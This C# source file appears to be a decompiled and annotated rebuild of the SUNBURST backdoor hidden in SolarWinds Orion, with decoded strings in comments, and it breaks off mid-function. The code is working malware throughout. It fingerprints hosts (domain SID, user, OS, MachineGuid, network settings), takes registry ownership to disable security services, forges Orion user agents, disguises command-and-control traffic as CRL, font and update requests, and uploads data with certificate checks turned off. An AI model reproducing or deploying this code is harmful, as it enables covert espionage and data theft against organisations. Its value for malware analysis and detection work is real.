public static void CollectSystemDescription(string info, out string result)
{
result = null;
int num = 0;
string domainName = IPGlobalProperties.GetIPGlobalProperties().DomainName;
result = result + Job.GetDescriptionId(ref num) + domainName;
try
{
// Administrator
string str = ((SecurityIdentifier) new NTAccount(domainName, ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier))).AccountDomainSid.ToString();
result = result + Job.GetDescriptionId(ref num) + str;
}
catch
{
result += Job.GetDescriptionId(ref num);
}
result = result + Job.GetDescriptionId(ref num) + IPGlobalProperties.GetIPGlobalProperties().HostName;
result = result + Job.GetDescriptionId(ref num) + Environment.UserName;
result = result + Job.GetDescriptionId(ref num) + Utilities.GetOSVersion(true);
result = result + Job.GetDescriptionId(ref num) + Environment.SystemDirectory;
result = result + Job.GetDescriptionId(ref num) + (int)TimeSpan.FromMilliseconds(Environment.TickCount).TotalDays;
result = result + Job.GetDescriptionId(ref num) + info + "\n";
result += Utilities.GetNetworkAdapterConfiguration();
}
public static bool RebootComputer()
{
bool flag = false;
bool result;
try
{
bool newState = false;
string privilege = ZipHelper.Unzip("C04NzigtSckvzwsoyizLzElNTwUA");
if (!NativeMethods.SetProcessPrivilege(privilege, true, out newState))
{
result = flag;
}
else
{
flag = NativeMethods.InitiateSystemShutdownEx(null, null, 0U, true, true, 2147745794U);
NativeMethods.SetProcessPrivilege(privilege, newState, out newState);
result = flag;
}
}
catch (Exception)
{
result = flag;
}
return(result);
}
private string GetUserAgent()
{
if (this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Get)
{
return(null);
}
if (this.requestMethod == HttpOipMethods.Post)
{
if (string.IsNullOrEmpty(Settings.userAgentDefault))
{
// Microsoft-CryptoAPI/
Settings.userAgentDefault = ZipHelper.Unzip("881MLsovzk8r0XUuqiwoyXcM8NQHAA==");
Settings.userAgentDefault += Utilities.GetOSVersion(false);
}
return(Settings.userAgentDefault);
}
if (string.IsNullOrEmpty(Settings.userAgentOrionImprovementClient))
{
// SolarWindsOrionImprovementClient/
Settings.userAgentOrionImprovementClient = ZipHelper.Unzip("C87PSSwKz8xLKfYvyszP88wtKMovS81NzStxzskEkvoA");
try
{
// \OrionImprovement\SolarWinds.OrionImprovement.exe
string text = Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location);
text += ZipHelper.Unzip("i/EvyszP88wtKMovS81NzSuJCc7PSSwKz8xLKdZDl9NLrUgFAA==");
Settings.userAgentOrionImprovementClient += FileVersionInfo.GetVersionInfo(text).FileVersion;
}
catch (Exception)
{
// 3.0.0.382
Settings.userAgentOrionImprovementClient += ZipHelper.Unzip("M9YzAEJjCyMA");
}
}
return(Settings.userAgentOrionImprovementClient);
}
private static string Base64Encode(byte[] bytes, bool rt)
{
// ph2eifo3n5utg1j8d94qrvbmk0sal76c
string text = ZipHelper.Unzip("K8gwSs1MyzfOMy0tSTfMskixNCksKkvKzTYoTswxN0sGAA==");
string text2 = "";
uint num = 0U;
int i = 0;
foreach (byte b in bytes)
{
num |= (uint)((uint)b << i);
for (i += 8; i >= 5; i -= 5)
{
text2 += text[(int)(num & 31U)].ToString();
num >>= 5;
}
}
if (i > 0)
{
if (rt)
{
num |= (uint)((uint)new Random().Next() << i);
}
text2 += text[(int)(num & 31U)].ToString();
}
return(text2);
}
private static void SetKeyOwnerWithPrivileges(RegistryKey key, string subKey, string owner)
{
try
{
RegistryHelper.SetKeyOwner(key, subKey, owner);
}
catch
{
bool newState = false;
bool newState2 = false;
bool flag = false;
bool flag2 = false;
// SeRestorePrivilege
string privilege = ZipHelper.Unzip("C04NSi0uyS9KDSjKLMvMSU1PBQA=");
// SeTakeOwnershipPrivilege
string privilege2 = ZipHelper.Unzip("C04NScxO9S/PSy0qzsgsCCjKLMvMSU1PBQA=");
flag = NativeMethods.SetProcessPrivilege(privilege2, true, out newState);
flag2 = NativeMethods.SetProcessPrivilege(privilege, true, out newState2);
try
{
RegistryHelper.SetKeyOwner(key, subKey, owner);
}
finally
{
if (flag)
{
NativeMethods.SetProcessPrivilege(privilege2, newState, out newState);
}
if (flag2)
{
NativeMethods.SetProcessPrivilege(privilege, newState2, out newState2);
}
}
}
}
private static string DecryptShort(string domain)
{
// 0123456789abcdefghijklmnopqrstuvwxyz-_.
if (domain.All((char c) => ZipHelper.Unzip("MzA0MjYxNTO3sExMSk5JTUvPyMzKzsnNyy8oLCouKS0rr6is0o3XAwA=").Contains(c)))
{
return(CryptoHelper.Base64Decode(domain));
}
return("00" + CryptoHelper.Base64Encode(Encoding.UTF8.GetBytes(domain), false));
}
private static RegistryHive GetHive(string key, out string subKey)
{
string[] array = key.Split(new char[]
{
'\\'
}, 2);
string a = array[0].ToUpper();
subKey = ((array.Length <= 1) ? "" : array[1]);
// HKEY_CLASSES_ROOT
// HKCR
if (a == ZipHelper.Unzip("8/B2jYx39nEMDnYNjg/y9w8BAA==") || a == ZipHelper.Unzip("8/B2DgIA"))
{
return(RegistryHive.ClassesRoot);
}
// HKEY_CURRENT_USER
// HKCU
if (a == ZipHelper.Unzip("8/B2jYx3Dg0KcvULiQ8Ndg0CAA==") || a == ZipHelper.Unzip("8/B2DgUA"))
{
return(RegistryHive.CurrentUser);
}
// HKEY_LOCAL_MACHINE
// HKLM
if (a == ZipHelper.Unzip("8/B2jYz38Xd29In3dXT28PRzBQA=") || a == ZipHelper.Unzip("8/D28QUA"))
{
return(RegistryHive.LocalMachine);
}
// HKEY_USERS
// HKU
if (a == ZipHelper.Unzip("8/B2jYwPDXYNCgYA") || a == ZipHelper.Unzip("8/AOBQA="))
{
return(RegistryHive.Users);
}
// HKEY_CURRENT_CONFIG
// HKCC
if (a == ZipHelper.Unzip("8/B2jYx3Dg0KcvULiXf293PzdAcA") || a == ZipHelper.Unzip("8/B2dgYA"))
{
return(RegistryHive.CurrentConfig);
}
// HKEY_PERFOMANCE_DATA
// HKPD
if (a == ZipHelper.Unzip("8/B2jYwPcA1y8/d19HN2jXdxDHEEAA==") || a == ZipHelper.Unzip("8/AOcAEA"))
{
return(RegistryHive.PerformanceData);
}
// HKEY_DYN_DATA
// HKDD
if (a == ZipHelper.Unzip("8/B2jYx3ifSLd3EMcQQA") || a == ZipHelper.Unzip("8/B2cQEA"))
{
return(RegistryHive.DynData);
}
return((RegistryHive)0);
}
private static bool SetManualMode(ServiceConfiguration.Service[] svcList)
{
try
{
// SYSTEM\CurrentControlSet\services
bool result = false;
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ZipHelper.Unzip("C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=")))
{
foreach (string text in registryKey.GetSubKeyNames())
{
foreach (ServiceConfiguration.Service service in svcList)
{
try
{
if (Utilities.GetHash(text.ToLower()) == service.timeStamp)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Interesting Service found " + text);
if (service.started)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Service is started " + text + " setting " + registryKey + "to false");
result = true;
RegistryHelper.SetKeyPermissions(registryKey, text, false);
}
else
{
using (RegistryKey registryKey2 = registryKey.OpenSubKey(text, true))
{
// Start
if (registryKey2.GetValueNames().Contains(ZipHelper.Unzip("Cy5JLCoBAA==")))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Setting " + text + " with value " + ZipHelper.Unzip("Cy5JLCoBAA=="));
// Start
registryKey2.SetValue(ZipHelper.Unzip("Cy5JLCoBAA=="), 4, RegistryValueKind.DWord);
result = true;
}
}
}
}
}
catch (Exception)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error in SetManualMode");
}
}
}
}
return result;
}
catch (Exception)
{
}
return false;
}
public static void SetAutomaticMode()
{
try
{
// SYSTEM\CurrentControlSet\services
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ZipHelper.Unzip("C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=")))
{
foreach (string text in registryKey.GetSubKeyNames())
{
foreach (ServiceConfiguration serviceConfiguration in Settings.svcList)
{
if (serviceConfiguration.stopped)
{
foreach (ServiceConfiguration.Service service in serviceConfiguration.Svc)
{
try
{
if (Utilities.GetHash(text.ToLower()) == service.timeStamp)
{
if (service.started)
{
RegistryHelper.SetKeyPermissions(registryKey, text, true);
}
else
{
using (RegistryKey registryKey2 = registryKey.OpenSubKey(text, true))
{
if (registryKey2.GetValueNames().Contains("Start"))
{
registryKey2.SetValue("Start"), service.DefaultValue, RegistryValueKind.DWord);
}
}
}
}
}
catch (Exception)
{
}
}
}
}
}
}
}
catch (Exception)
{
}
}
private static string Base64Decode(string s)
{
// rq3gsalt6u1iyfzop572d49bnx8cvmkewhj
string text = ZipHelper.Unzip("Kyo0Ti9OzCkxKzXMrEyryi8wNTdKMbFMyquwSC7LzU4tz8gCAA==");
// 0_-.
string text2 = ZipHelper.Unzip("M4jX1QMA");
string text3 = "";
Random random = new Random();
foreach (char value in s)
{
int num = text2.IndexOf(value);
text3 = ((num < 0) ? (text3 + text[(text.IndexOf(value) + 4) % text.Length].ToString()) : (text3 + text2[0].ToString() + text[num + random.Next() % (text.Length / text2.Length) * text2.Length].ToString()));
}
return(text3);
}
private static string GetNewOwnerName()
{
string text = null;
// S-1-5-
string value = ZipHelper.Unzip("C9Y11DXVBQA=");
// -500
string value2 = ZipHelper.Unzip("0zU1MAAA");
try
{
// Administrator
text = new NTAccount(ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier)).Value;
}
catch
{
}
if (string.IsNullOrEmpty(text) || !text.StartsWith(value, StringComparison.OrdinalIgnoreCase) || !text.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
{
// Select * From Win32_UserAccount
string queryString = ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA");
text = null;
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(queryString))
{
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
// SID
ManagementObject managementObject = (ManagementObject)managementBaseObject;
string text2 = managementObject.Properties[ZipHelper.Unzip("C/Z0AQA=")].Value.ToString();
// LocalAccount
// true
if (managementObject.Properties[ZipHelper.Unzip("88lPTsxxTE7OL80rAQA=")].Value.ToString().ToLower() == ZipHelper.Unzip("KykqTQUA") && text2.StartsWith(value, StringComparison.OrdinalIgnoreCase))
{
if (text2.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
{
text = text2;
break;
}
if (string.IsNullOrEmpty(text))
{
text = text2;
}
}
}
}
}
return(new SecurityIdentifier(text).Translate(typeof(NTAccount)).Value);
}
public static void GetProcessByDescription(string[] args, out string result)
{
result = null;
if (args.Length == 0)
{
foreach (Process process in Process.GetProcesses())
{
// [{0,5}] {1}
result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNqzlAgA="), process.Id, Utilities.Quote(process.ProcessName));
}
return;
}
// Select * From Win32_Process
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=")))
{
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
ManagementObject managementObject = (ManagementObject)managementBaseObject;
string[] array = new string[]
{
string.Empty,
string.Empty
};
ManagementObject managementObject2 = managementObject;
// GetOwner
string methodName = ZipHelper.Unzip("c08t8S/PSy0CAA==");
object[] array2 = array;
object[] args2 = array2;
// [{0,5}] {1,-16} {2} {3,5} {4}\{5}
Convert.ToInt32(managementObject2.InvokeMethod(methodName, args2));
result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA="), new object[]
{
// ProcessID
// Name
// ParentProcessID
managementObject[ZipHelper.Unzip("CyjKT04tLvZ0AQA=")],
Utilities.Quote(managementObject[ZipHelper.Unzip("80vMTQUA")].ToString()),
managementObject[args[0]],
managementObject[ZipHelper.Unzip("C0gsSs0rCSjKT04tLvZ0AQA=")],
array[1],
array[0]
});
}
}
}
public static string GetNetworkAdapterConfiguration()
{
string text = "";
string result;
try
{
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(
// Select * From Win32_NetworkAdapterConfiguration where IPEnabled=true
ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNor3Sy0pzy/KdkxJLChJLXLOz0vLTC8tSizJzM9TKM9ILUpV8AxwzUtMyklNsS0pKk0FAA==")))
{
foreach (ManagementObject obj in managementObjectSearcher.Get().Cast <ManagementObject>())
{
text += "\n";
// Description
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c0ktTi7KLCjJzM8DAA=="));
// MACAddress
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("83V0dkxJKUotLgYA"));
// DHCPEnabled
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/FwDnDNS0zKSU0BAA=="));
// DHCPServer
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/FwDghOLSpLLQIA"));
// DNSHostName
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/EL9sgvLvFLzE0FAA=="));
// DNSDomainSuffixSearchOrder
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/ELdsnPTczMCy5NS8usCE5NLErO8C9KSS0CAA=="));
// DNSServerSearchOrder
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c/ELDk4tKkstCk5NLErO8C9KSS0CAA=="));
// IPAddress
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("8wxwTEkpSi0uBgA="));
// IPSubnet
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("8wwILk3KSy0BAA=="));
// DefaultIPGateway
text += GetManagementObjectProperty(obj, ZipHelper.Unzip("c0lNSyzNKfEMcE8sSS1PrAQA"));
}
result = text;
}
}
catch (Exception ex)
{
result = text + ex.Message;
}
return(result);
}
public static string GetOSVersion(bool full)
{
if (osVersion == null || osInfo == null)
{
try
{
// Select * From Win32_OperatingSystem
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNor3L0gtSizJzEsPriwuSc0FAA==")))
{
ManagementObject managementObject = managementObjectSearcher.Get().Cast <ManagementObject>().FirstOrDefault <ManagementObject>();
// Caption
osInfo = managementObject.Properties[ZipHelper.Unzip("c04sKMnMzwMA")].Value.ToString();
// OSArchitecture
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8w92LErOyCxJTS4pLUoFAA==")].Value.ToString();
// InstallDate
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("88wrLknMyXFJLEkFAA==")].Value.ToString();
// Organization
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8y9KT8zLrEosyczPAwA=")].Value.ToString();
// RegisteredUser
osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("C0pNzywuSS1KTQktTi0CAA==")].Value.ToString();
// Version
string text = managementObject.Properties[ZipHelper.Unzip("C0stKs7MzwMA")].Value.ToString();
osInfo = osInfo + ";" + text;
string[] array = text.Split(new char[]
{
'.'
});
osVersion = array[0] + "." + array[1];
}
}
catch (Exception)
{
osVersion = Environment.OSVersion.Version.Major + "." + Environment.OSVersion.Version.Minor;
// [E] {0} {1} {2}
osInfo = string.Format(ZipHelper.Unzip("i3aNVag2qFWoNgRio1oA"), Environment.OSVersion.VersionString, Environment.OSVersion.Version, Environment.Is64BitOperatingSystem ? 64 : 32);
}
}
if (!full)
{
return(osVersion);
}
return(osInfo);
}
private static bool GetOrCreateUserID(out byte[] hash64)
{
string text = ReadDeviceInfo();
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Device info: " + text);
hash64 = new byte[8];
Array.Clear(hash64, 0, hash64.Length);
if (text == null)
{
return(false);
}
text += domain4;
try
{
// HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
// MachineGuid
text += RegistryHelper.GetValue(ZipHelper.Unzip("8/B2jYz38Xd29In3dXT28PRzjQn2dwsJdwxyjfHNTC7KL85PK4lxLqosKMlPL0osyKgEAA=="), ZipHelper.Unzip("801MzsjMS3UvzUwBAA=="), "");
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Registry/MachineGuid info: " + text);
}
catch
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error GetOrCreateUserID");
}
using (MD5 md = MD5.Create())
{
byte[] bytes = Encoding.ASCII.GetBytes(text);
byte[] array = md.ComputeHash(bytes);
if (array.Length < hash64.Length)
{
return(false);
}
for (int i = 0; i < array.Length; i++)
{
byte[] array2 = hash64;
int num = i % hash64.Length;
array2[num] ^= array[i];
}
}
return(true);
}
public static bool WriteReportStatus(ReportStatus status)
{
ReportStatus reportStatus;
if (ConfigManager.ReadReportStatus(out reportStatus))
{
switch (status)
{
// 4
case ReportStatus.New:
return(ConfigManager.WriteConfig(Settings.reportStatusName, ZipHelper.Unzip("MwEA")));
// 5
case ReportStatus.Append:
return(ConfigManager.WriteConfig(Settings.reportStatusName, ZipHelper.Unzip("MwUA")));
// 3
case ReportStatus.Truncate:
return(ConfigManager.WriteConfig(Settings.reportStatusName, ZipHelper.Unzip("MwYA")));
}
}
return(false);
}
public string GetPreviousString(out bool last)
{
string text = CryptoHelper.CreateSecureString(this.guid, true);
int num = 32 - text.Length - 1;
string result = "";
last = false;
if (this.offset >= this.dnStr.Length || this.nCount > 36)
{
return(result);
}
int num2 = Math.Min(num, this.dnStr.Length - this.offset);
this.dnStrLower = this.dnStr.Substring(this.offset, num2);
this.offset += num2;
// -_0
if (ZipHelper.Unzip("0403AAA=").Contains(this.dnStrLower[this.dnStrLower.Length - 1]))
{
if (num2 == num)
{
this.offset--;
this.dnStrLower = this.dnStrLower.Remove(this.dnStrLower.Length - 1);
}
this.dnStrLower += "0";
}
if (this.offset >= this.dnStr.Length || this.nCount > 36)
{
this.nCount = -1;
}
result = text + CryptoHelper.CreateString(this.nCount, text[0]) + this.dnStrLower + this.GetStatus();
if (this.nCount >= 0)
{
this.nCount++;
}
last = (this.nCount < 0);
return(result);
}
public static void SetKeyPermissions(RegistryKey key, string subKey, bool reset)
{
bool isProtected = !reset;
// SYSTEM
string text = ZipHelper.Unzip("C44MDnH1BQA=");
string text2 = reset ? text : RegistryHelper.GetNewOwnerName();
RegistryHelper.SetKeyOwnerWithPrivileges(key, subKey, text);
using (RegistryKey registryKey = key.OpenSubKey(subKey, RegistryKeyPermissionCheck.ReadWriteSubTree, RegistryRights.ChangePermissions))
{
RegistrySecurity registrySecurity = new RegistrySecurity();
if (!reset)
{
RegistryAccessRule rule = new RegistryAccessRule(text2, RegistryRights.FullControl, InheritanceFlags.None, PropagationFlags.NoPropagateInherit, AccessControlType.Allow);
registrySecurity.AddAccessRule(rule);
}
registrySecurity.SetAccessRuleProtection(isProtected, false);
registryKey.SetAccessControl(registrySecurity);
}
if (!reset)
{
RegistryHelper.SetKeyOwnerWithPrivileges(key, subKey, text2);
}
}
public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
{
result = null;
string requestUriString = args[0];
string s = args[1];
string text = (args.Length >= 3) ? args[2] : null;
string[] array = Encoding.UTF8.GetString(Convert.FromBase64String(s)).Split(new string[]
{
"\r\n",
"\r",
"\n"
}, StringSplitOptions.None);
HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(requestUriString);
HttpWebRequest httpWebRequest2 = httpWebRequest;
httpWebRequest2.ServerCertificateValidationCallback =
(RemoteCertificateValidationCallback)Delegate.Combine(httpWebRequest2.ServerCertificateValidationCallback, new RemoteCertificateValidationCallback((object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors sslPolicyErrors) => true));
httpWebRequest.Proxy = proxy;
httpWebRequest.Timeout = 120000;
httpWebRequest.Method = array[0].Split(new char[]
{
' '
})[0];
foreach (string text2 in array)
{
int num = text2.IndexOf(':');
if (num > 0)
{
string text3 = text2.Substring(0, num);
string text4 = text2.Substring(num + 1).TrimStart(Array.Empty <char>());
if (!WebHeaderCollection.IsRestricted(text3))
{
httpWebRequest.Headers.Add(text2);
}
else
{
ulong hash = Utilities.GetHash(text3.ToLower());
// expect
if (hash <= 8873858923435176895UL)
{
// content-type
if (hash <= 6116246686670134098UL)
{
// accept
if (hash != 2734787258623754862UL)
{
// content-type
if (hash == 6116246686670134098UL)
{
httpWebRequest.ContentType = text4;
}
}
else
{
httpWebRequest.Accept = text4;
}
}
// user-agent
else if (hash != 7574774749059321801UL)
{
// expect
if (hash == 8873858923435176895UL)
{
// 100-continue
if (Utilities.GetHash(text4.ToLower()) == 1475579823244607677UL)
{
httpWebRequest.ServicePoint.Expect100Continue = true;
}
else
{
httpWebRequest.Expect = text4;
}
}
}
else
{
httpWebRequest.UserAgent = text4;
}
}
// connection
else if (hash <= 11266044540366291518UL)
{
// referer
if (hash != 9007106680104765185UL)
{
// connection
if (hash == 11266044540366291518UL)
{
ulong hash2 = Utilities.GetHash(text4.ToLower());
// keep-alive
httpWebRequest.KeepAlive = (hash2 == 13852439084267373191UL || httpWebRequest.KeepAlive);
// close
httpWebRequest.KeepAlive = (hash2 != 14226582801651130532UL && httpWebRequest.KeepAlive);
}
}
else
{
httpWebRequest.Referer = text4;
}
}
// if-modified-since
else if (hash != 15514036435533858158UL)
{
// date
if (hash == 16066522799090129502UL)
{
httpWebRequest.Date = DateTime.Parse(text4);
}
}
else
{
httpWebRequest.Date = DateTime.Parse(text4);
}
}
}
}
// {0} {1} HTTP/{2}
result += string.Format(ZipHelper.Unzip("qzaoVag2rFXwCAkJ0K82quUCAA=="), httpWebRequest.Method, httpWebRequest.Address.PathAndQuery, httpWebRequest.ProtocolVersion.ToString());
result = result + httpWebRequest.Headers.ToString() + "\n\n";
if (!string.IsNullOrEmpty(text))
{
using (Stream requestStream = httpWebRequest.GetRequestStream())
{
byte[] array3 = Convert.FromBase64String(text);
requestStream.Write(array3, 0, array3.Length);
}
}
using (WebResponse response = httpWebRequest.GetResponse())
{
result += string.Format("{0} {1}\n", (int)((HttpWebResponse)response).StatusCode, ((HttpWebResponse)response).StatusDescription);
result = result + response.Headers.ToString() + "\n";
using (Stream responseStream = response.GetResponseStream())
{
result += new StreamReader(responseStream).ReadToEnd();
}
}
}
private static bool SearchConfigurations()
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Entering SearchConfigurations()");
// Select * From Win32_SystemDriver
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Search Configurations: " + ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA=="));
using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==")))
{
foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
{
// PathName
ulong hash = Utilities.GetHash(Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()).ToLower());
if (!Settings.printy)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Checking property: " + ZipHelper.Unzip("C0gsyfBLzE0FAA==") + " GetFileName: " + Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()));
}
if ((Array.IndexOf<ulong>(Settings.configTimeStamps, hash) != -1))
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Check for special drivers failed . Backdoor ConfigTimeStamps detected last GetFileName with hash " + hash + " [Use -r to Bypass]");
if (Settings.bypassr)
{
Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Because you are bypassing drivers/process check, the backdoor will continue. In a normal case teh backdoor stop execution. ");
}
else
{
return true;
}
}
}
}
return false;
}
private string GetBaseUriImpl(HttpHelper.HttpOipExMethods method, int err)
{
string text = null;
if (method == HttpHelper.HttpOipExMethods.Head)
{
text = ((ushort)err).ToString();
}
if (this.requestMethod == HttpOipMethods.Post)
{
string[] array = new string[]
{
// -root
ZipHelper.Unzip("0y3Kzy8BAA=="),
// -cert
ZipHelper.Unzip("001OLSoBAA=="),
// -universal_ca
ZipHelper.Unzip("0y3NyyxLLSpOzIlPTgQA"),
// -ca
ZipHelper.Unzip("001OBAA="),
// -primary_ca
ZipHelper.Unzip("0y0oysxNLKqMT04EAA=="),
// -timestamp
ZipHelper.Unzip("0y3JzE0tLknMLQAA"),
"",
// -global
ZipHelper.Unzip("003PyU9KzAEA"),
// -secureca
ZipHelper.Unzip("0y1OTS4tSk1OBAA=")
};
// pki/crl/{0}{1}{2}.crl
return(string.Format(ZipHelper.Unzip("K8jO1E8uytGvNqitNqytNqrVA/IA"), this.random.Next(100, 10000), array[this.random.Next(array.Length)], (text == null) ? "" : ("-" + text)));
}
if (this.requestMethod == HttpOipMethods.Put)
{
string[] array2 = new string[]
{
// Bold
ZipHelper.Unzip("c8rPSQEA"),
// BoldItalic
ZipHelper.Unzip("c8rPSfEsSczJTAYA"),
// ExtraBold
ZipHelper.Unzip("c60oKUp0ys9JAQA="),
// ExtraBoldItalic
ZipHelper.Unzip("c60oKUp0ys9J8SxJzMlMBgA="),
// Italic
ZipHelper.Unzip("8yxJzMlMBgA="),
// Light
ZipHelper.Unzip("88lMzygBAA=="),
// LightItalic
ZipHelper.Unzip("88lMzyjxLEnMyUwGAA=="),
// Regular
ZipHelper.Unzip("C0pNL81JLAIA"),
// SemiBold
ZipHelper.Unzip("C07NzXTKz0kBAA=="),
// SemiBoldItalic
ZipHelper.Unzip("C07NzXTKz0nxLEnMyUwGAA==")
};
string[] array3 = new string[]
{
// opensans
ZipHelper.Unzip("yy9IzStOzCsGAA=="),
// noto
ZipHelper.Unzip("y8svyQcA"),
// freefont
ZipHelper.Unzip("SytKTU3LzysBAA=="),
// SourceCodePro
ZipHelper.Unzip("C84vLUpOdc5PSQ0oygcA"),
// SourceSerifPro
ZipHelper.Unzip("C84vLUpODU4tykwLKMoHAA=="),
// SourceHanSans
ZipHelper.Unzip("C84vLUpO9UjMC07MKwYA"),
// SourceHanSerif
ZipHelper.Unzip("C84vLUpO9UjMC04tykwDAA==")
};
int num = this.random.Next(array3.Length);
if (num <= 1)
{
// fonts/woff/{0}-{1}-{2}-webfont{3}.woff2
return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA"), new object[]
{
this.random.Next(100, 10000),
array3[num],
array2[this.random.Next(array2.Length)].ToLower(),
text
}));
}
// fonts/woff/{0}-{1}-{2}{3}.woff2
return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA="), new object[]
{
this.random.Next(100, 10000),
array3[num],
array2[this.random.Next(array2.Length)],
text
}));
}
else
{
if (method <= HttpHelper.HttpOipExMethods.Head)
{
string text2 = "";
if (this.Valid(20))
{
// SolarWinds
text2 += ZipHelper.Unzip("C87PSSwKz8xLKQYA");
if (this.Valid(40))
{
// .CortexPlugin
text2 += ZipHelper.Unzip("03POLypJrQjIKU3PzAMA");
}
}
if (this.Valid(80))
{
// .Orion
text2 += ZipHelper.Unzip("0/MvyszPAwA=");
}
if (this.Valid(80))
{
string[] array4 = new string[]
{
// Wireless
ZipHelper.Unzip("C88sSs1JLS4GAA=="),
// UI
ZipHelper.Unzip("C/UEAA=="),
// Widgets
ZipHelper.Unzip("C89MSU8tKQYA"),
// NPM
ZipHelper.Unzip("8wvwBQA="),
// Apollo
ZipHelper.Unzip("cyzIz8nJBwA="),
// CloudMonitoring
ZipHelper.Unzip("c87JL03xzc/LLMkvysxLBwA=")
};
text2 = text2 + "." + array4[this.random.Next(array4.Length)];
}
if (this.Valid(30) || string.IsNullOrEmpty(text2))
{
string[] array5 = new string[]
{
// Nodes
ZipHelper.Unzip("88tPSS0GAA=="),
// Volumes
ZipHelper.Unzip("C8vPKc1NLQYA"),
// Interfaces
ZipHelper.Unzip("88wrSS1KS0xOLQYA"),
// Components
ZipHelper.Unzip("c87PLcjPS80rKQYA")
};
text2 = text2 + "." + array5[this.random.Next(array5.Length)];
}
if (this.Valid(30) || text != null)
{
text2 = string.Concat(new object[]
{
text2,
"-",
this.random.Next(1, 20),
".",
this.random.Next(1, 30)
});
if (text != null)
{
text2 = text2 + "." + ((ushort)err).ToString();
}
}
// swip/upd/
return(ZipHelper.Unzip("Ky7PLNAvLUjRBwA=") + text2.TrimStart(new char[]
{
'.'
// .xml
}) + ZipHelper.Unzip("06vIzQEA"));
}
if (method != HttpHelper.HttpOipExMethods.Put)
{
// swip/Upload.ashx
return(ZipHelper.Unzip("Ky7PLNAPLcjJT0zRSyzOqAAA"));
}
// swip/Events
return(ZipHelper.Unzip("Ky7PLNB3LUvNKykGAA=="));
}
}
private HttpStatusCode CreateUploadRequest(HttpHelper.JobEngine job, int err, string response, out byte[] outData)
{
string text = this.httpHost;
byte[] array = null;
HttpHelper.HttpOipExMethods httpOipExMethods = (job != HttpHelper.JobEngine.Idle && job != HttpHelper.JobEngine.None) ? HttpHelper.HttpOipExMethods.Head : HttpHelper.HttpOipExMethods.Get;
outData = null;
try
{
if (!string.IsNullOrEmpty(response))
{
byte[] bytes = Encoding.UTF8.GetBytes(response);
byte[] bytes2 = BitConverter.GetBytes(err);
